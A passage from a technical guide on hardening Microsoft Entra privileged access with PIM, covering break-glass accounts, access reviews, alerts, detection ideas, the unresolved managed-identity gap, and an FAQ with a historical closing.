This lists every standing-active Global Administrator in the tenant. Compare against your break-glass roster and your active PIM activations. Anything else is technical debt.

Step 2: Configure access reviews

Quarterly for Tier-0 and control-plane roles. Semi-annually for Tier-1 and management-plane. Annually for Tier-2 and data/workload-plane [@ms-learn-pim-access-reviews]. Turn on the ML-based review recommendations: the 30-day inactive-user Deny recommendation is the reviewer-assist baseline, and the user-to-group-affiliation Deny recommendation helps reviewers spot principals who are organizationally distant from the rest of the group's membership [@ms-learn-review-recommendations].

Step 3: Turn on every PIM Alert and tune the GA-count threshold

Enable all six behavioural PIM Alerts. Tune the "There are too many Global Administrators" alert to a minimum count of two and a percentage of 50% [@ms-learn-pim-alerts]. The expected steady-state count is "fewer than five standing GAs, most of which are break-glass." The High-severity assignment-bypass alert is non-negotiable; route it to a 24x7 SOC queue with an incident-response runbook.Microsoft Secure Score's "Limit the number of Global Administrators" recommendation targets fewer than five standing GAs as the canonical baseline.

Step 4: Break-glass discipline

Two emergency-access permanent-active Global Administrator accounts. Not one, not three.

Note: One break-glass account is a single point of failure: if it is locked, lost, or compromised, the tenant has no emergency entry path. Three or more begin to expand the blast radius unnecessarily. Two balances the two failure modes. FIDO2 hardware keys, stored in physical safes, with continuous sign-in alerting.

Note: Conditional Access policies can lock you out. Break-glass accounts must be excluded from every CA policy that could prevent their sign-in. Compensate with continuous sign-in alerting on every break-glass authentication event; alerts are the substitute for the gate you are deliberately removing.

Step 5: Extend PIM to the four boundaries

PIM-for-Groups: gate ownership of every directory-role-assignable group, every privileged-access security group, and every group that grants management-group-level Azure RBAC. Membership alone is insufficient; ownership is a backdoor to membership.

PIM-for-Azure-Resources: gate Owner, User Access Administrator, and Contributor at the management-group scope, then explicitly at every subscription, every resource group, and every resource where the role is assignable. Inheritance does not flow; configure per scope.

GDAP and Lighthouse: every CSP partner authorization must be eligible, not active. Set the customer-side PIM policy explicitly. Audit annually.

PIM with Conditional Access: attach an authentication-context tag to activation policies on the privileged Entra roles. Add a CA policy that requires a compliant device and a fresh MFA challenge on activation. The activation gate becomes structurally tighter than the sign-in gate, which is the correct ordering for high-privilege actions.

Step 6: Continuous detection

Pipe PIM activation events (via Microsoft Graph audit logs, surfaced in the AuditLogs and MicrosoftGraphActivityLogs Azure Monitor tables) to your SIEM. Cross-correlate with Entra ID Protection sign-in risk and Microsoft Sentinel UEBA anomaly signals [@ms-learn-sentinel-ueba]. KQL templates to write: (a) GA activations outside business hours; (b) activations from non-compliant devices; (c) the assignment-bypass alert correlated with the activating principal's recent sign-in risk score; (d) managed-identity token issuance against subscription-scoped Owner.

Step 7: Mind the application-identity surface

This is the longest-running open item. Inventory every managed identity in the tenant. For each, document the role assignment, the scope, and the resource that holds it.

Apply the "Owner and User Access Administrator at subscription scope is dangerous" rule first; tighten those to Contributor or a custom role wherever possible. Where a managed identity must hold a high-privilege role at a high scope, treat the underlying resource (Function App, Logic App, VM, AKS cluster) as a Tier-0 asset for the purposes of patching, network exposure, and code-review process. Until PIM gates application identities natively, the Tier-0-asset framing is the substitute control.

That is the playbook for the user-principal side of the JIT-admin problem. The application-identity side is still being written. The next iteration of this material will be about the data-model extension that closes Robbins's gap, or the architectural successor that arrives in its place.

12. Frequently Asked Questions and Closing

Three classes of question come up every time this material is taught. The first is conceptual ("what does eligible actually mean?"). The second is operational ("do I need MFA?"). The third is adversarial ("what about managed identities?"). Each appears below.

No. Eligible assignments are permanent in most tenants -- they are the standing relationship between principal and role -- but they grant no privilege until you activate. Only the *active* state is bounded. Your admin rights still exist; they are simply not exercised continuously [@ms-learn-pim-configure]. Only if the role's activation policy is configured to require it. PIM's activation gates -- MFA at activation, approval, justification, ticket number, and activation maximum duration -- are per-role, per-scope flags the tenant sets independently. A role with `requires_mfa=false` and `requires_approval=false` is a valid (if loose) PIM configuration [@ms-learn-pim-change-default-settings]. One hour for the highest-privileged Entra directory roles, including Global Administrator and Privileged Role Administrator. The configurable range is one to twenty-four hours per role per scope [@ms-learn-pim-change-default-settings]. Tighten where you can; the activation cost is small, the standing-active surface saving is large. No. Conditional Access gates the sign-in event. PIM bounds the assignment state. A compromised CA-gated GA still has GA privileges once they sign in -- the gate that mattered (activation) was never traversed. CA and PIM compose; PIM is not a substitute for CA, and CA is not a substitute for PIM. No. PIM alerts via the High-severity "Roles are being assigned outside of Privileged Identity Management" alert when a direct assignment happens [@ms-learn-pim-alerts]. The detection is intentional rather than preventive: blocking direct assignment would break the Microsoft Graph integration surface every legitimate administrative tool uses. Preventive controls -- Conditional Access on the Graph endpoint, Azure Policy at the management-group scope, or entitlement-management workflows -- are added separately based on the tenant's tooling estate. No. PIM's eligible/active state machine is defined over user and group principals. Service principals, managed identities, and OAuth consent grants route around PIM activation entirely. Andy Robbins's June 2022 *Managed Identity Attack Paths* series [@robbins-mip-part1], [@robbins-mip-part2], [@robbins-mip-part3] is the canonical demonstration; MITRE ATT&CK T1078.004 [@mitre-t1078-004] cites Robbins as primary reference. Workload ID Premium plus Conditional Access for workload identities extends sign-in-time controls to service principals (with managed identities still excluded), but does not yet introduce an eligible category for workload-identity role assignments [@ms-learn-ca-workload-identity], [@ms-learn-workload-identity-risk]. Microsoft has shifted the framing to the Enterprise Access Model: control plane, management plane, and data/workload plane [@ms-learn-eam]. The retirement of Tier-0/1/2 is partial; the practitioner community still uses the legacy terms day to day. The underlying principle -- privilege boundaries you do not cross with a single credential -- is preserved across both framings.

Closing

Read the section 1 vignette again. The 2026 tenant where alice@contoso.com is Global Administrator for exactly one hour, with an audit log so complete the SOC 2 auditor signs it without questions, is not a configuration choice. It is the visible behaviour of an identity system whose role-assignment object carries one more field than the 2015 version did. Standing admin did not retire because operators got more disciplined. Standing admin retired because the data model grew a second state.

The forty years between Saltzer and Schroeder's 1975 paper and the 2015 Azure AD PIM Preview were not lost time. UNIX sudo, Kerberos delegation, DACLs, AD groups, MIM PAM, Pass-the-Hash v1 and v2, the Securing Privileged Access roadmap -- each built up the structural understanding that least privilege required a temporal mechanism, not just a static one, and that the temporal mechanism had to live on the assignment object itself, not on the group, the credential, the session, or any indirection through a separate forest. The single new field on the role-assignment object is what those forty years were preparing.

What remains undone is the application-identity boundary. The same role-assignment object Microsoft retrofitted to gate user activation does not yet gate the managed identity attached to a Function App. The IMDS endpoint at 169.254.169.254 is the canonical 2026 bypass path that proves it. Closing that gap, when it comes, will not be a patch to the existing eligible/active state machine. It will be the next chapter -- the one where the state machine learns to apply to a principal that cannot perform an interactive MFA challenge, and the activation semantics are reinvented for the non-interactive case.

The story is not finished. But the first chapter -- the chapter where standing admin became visibly the anti-pattern it had always been -- is.